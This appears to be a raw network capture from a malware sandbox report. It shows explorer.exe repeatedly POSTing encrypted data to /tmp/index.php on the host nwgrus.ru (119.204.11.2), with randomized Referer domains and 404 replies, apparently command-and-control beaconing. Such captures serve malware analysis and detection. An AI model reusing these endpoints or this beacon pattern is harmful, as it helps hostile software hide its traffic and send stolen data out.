Oct 12, 2024 20:08:03.293900013 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vllrmfxybsdiplqu.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: nwgrus.ru
Oct 12, 2024 20:08:03.293936014 CEST	140	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1c 6b 2c 90 f5 76 0b 75 67 3c a4 96 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vug<MHE}}1{%>,TL>ih`n5NTk~
Oct 12, 2024 20:08:04.804044962 CEST	189	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	50002	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:06.666564941 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tamqyjusikafosy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 319 Host: nwgrus.ru
Oct 12, 2024 20:08:06.666588068 CEST	319	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2c 5b 1c 6b 2c 90 f5 76 0b 75 30 30 ed 96 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA ,[k,vu00M]jBytl,h+8(2WXU:e>3o:T*)o;A:{-J(I"ujZG],ITouF9vYg^Z7
Oct 12, 2024 20:08:08.140535116 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	50003	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:08.149559021 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rtsymdwebcyefo.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 210 Host: nwgrus.ru
Oct 12, 2024 20:08:08.149594069 CEST	210	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 2b 1a cb af Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu+V!wpyq$TCn*h_w/T?K7M7zq%5hB;R;J/\PHr
Oct 12, 2024 20:08:09.781217098 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:09 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	50004	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:09.790385008 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://cmpymujrwfied.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 173 Host: nwgrus.ru
Oct 12, 2024 20:08:09.790419102 CEST	173	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 75 5d ea ee Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuu]r_dQuX^Z/cFOF(+To$sf7[%,[.Z/
Oct 12, 2024 20:08:11.264607906 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:10 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	50005	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:11.274945021 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mlfyuywbsduqi.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 308 Host: nwgrus.ru
Oct 12, 2024 20:08:11.274966955 CEST	308	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 77 59 fa 81 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuwYD)ZyBnsJ\|{-fB;C\,7~S7*kC_6l498J_EwJgK8qHA`YdaH5T
Oct 12, 2024 20:08:12.806922913 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	50006	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:12.816751003 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xasjtfaqoixq.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: nwgrus.ru
Oct 12, 2024 20:08:12.816786051 CEST	117	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 7b 02 d8 a5 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu{~~OFvoO,nq
Oct 12, 2024 20:08:15.107202053 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 12, 2024 20:08:15.107314110 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Oct 12, 2024 20:08:15.108445883 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:13 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	50007	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:15.116512060 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fedsyouolon.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 278 Host: nwgrus.ru
Oct 12, 2024 20:08:15.116561890 CEST	278	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 56 37 d2 be Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vuV7uAOw6No~fDG~gR55t_RPPI<rO:q-wyl/--/b/CU?~yRhB^Ei
Oct 12, 2024 20:08:16.638910055 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:16 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	50008	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:16.650084019 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://lbemhhdwkax.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 359 Host: nwgrus.ru
Oct 12, 2024 20:08:16.650121927 CEST	359	OUT	Data Raw: 3b 6e 26 11 f5 cd 1b 23 d8 d9 b3 07 07 04 7a b9 7d 7d bb ec 18 03 95 12 01 75 7f 97 47 c5 c5 6e 93 5e ce 2f 73 68 24 1b ed ee 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 33 36 e0 e9 Data Ascii: ;n&#z}}uGn^/sh$?#1\|J7 M@NA -[k,vu36d#MgaXM.9TLAuC-{E1OHD\]EspC!E9"F{Z~Th;h-zk(:s{k=EQR
Oct 12, 2024 20:08:18.120666981 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 12 Oct 2024 18:08:17 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	50009	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 12, 2024 20:08:18.140367031 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tihslqvhibr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 186 Host: nwgrus.ru
